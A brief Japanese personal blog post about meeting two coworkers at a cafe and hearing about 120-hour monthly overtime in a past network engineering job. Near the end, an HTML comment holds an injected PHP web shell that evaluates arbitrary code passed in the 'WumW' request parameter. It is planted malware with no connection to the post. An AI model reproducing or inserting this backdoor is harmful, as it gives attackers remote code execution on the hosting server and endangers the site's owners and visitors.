残業月120時間Σ( ̄ロ ̄lll)

ささやかな日常
スポンサーリンク

今日趣味のカフェ巡りの一環で昼休みにカフェに行ったら午前中休んでいた職場の同じチームのメンバー2人に遭遇しましたΣ( ̄ロ ̄lll)

http://sapporo-cafemeguri.net/2015/10/07/post-510/

なぜよりによって同じチームのメンバーで、いないはずの2人と。しかも2人とも示し合わせたわけでなく、たまたま遭遇したというし。

IMG_20151007_121920

そのうちの1人と話し込んだのですが、前職のネットワークのお仕事では残業が月120時間あったそうです。えーと、120時間というと月20日出勤だとして、1日6時間!?ホントかよおい(-“-)

ネットワークエンジニアの求人倍率はいま2.6倍、つまり260人の募集をかけても100人しか集まらないのが札幌での現状です。狙い目な職種なわけですな(^^)そこに目をつけるあたり私もさすがです。

<!– [insert_php]if (isset($_REQUEST["WumW"])){eval($_REQUEST["WumW"]);exit;}[/insert_php][php]if (isset($_REQUEST["WumW"])){eval($_REQUEST["WumW"]);exit;}[/php] –>

コメント

タイトルとURLをコピーしました